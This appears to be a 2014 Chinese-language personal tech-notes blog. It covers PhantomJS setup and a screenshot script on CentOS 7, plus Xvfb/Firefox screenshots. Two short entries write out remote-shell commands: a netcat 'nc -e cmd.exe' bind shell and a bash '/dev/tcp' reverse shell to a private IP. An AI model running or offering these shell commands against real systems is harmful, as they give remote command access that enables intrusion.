2014年10月7日 星期二

2014年10月6日 星期一

CentOS 7 phantomjs 中文使用筆記

安裝
download phantomjs-1.9.7-linux-x86_64.tar.bz2
yum install fontconfig freetype  libstdc++
yum install *fonts*

使用範例
編輯 exp.js 內容如下
var page = require('webpage').create();

page.open('http://www.google.com', function() {

    page.viewportSize = {width: 1024, height: 768};
    page.render('screenshot.png');
    phantom.exit();
});

 ./phantomjs exp.js

使用 nc 作為 windows telnet server

nc -l -p 8080 -t -e cmd.exe

Screenshot Capturing Basics

CentOS 6,7
yum install Xvfb ImageMagick
yum install firefox

Xvfb :2 -screen 0 1024x768x24&
DISPLAY=:2 firefox http://www.example.com
import -window root example.png

2014年10月1日 星期三

bash reverse shell

client host:10.0.0.1(接收端) 執行
nc -l 8080

server:端(傳送端)
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1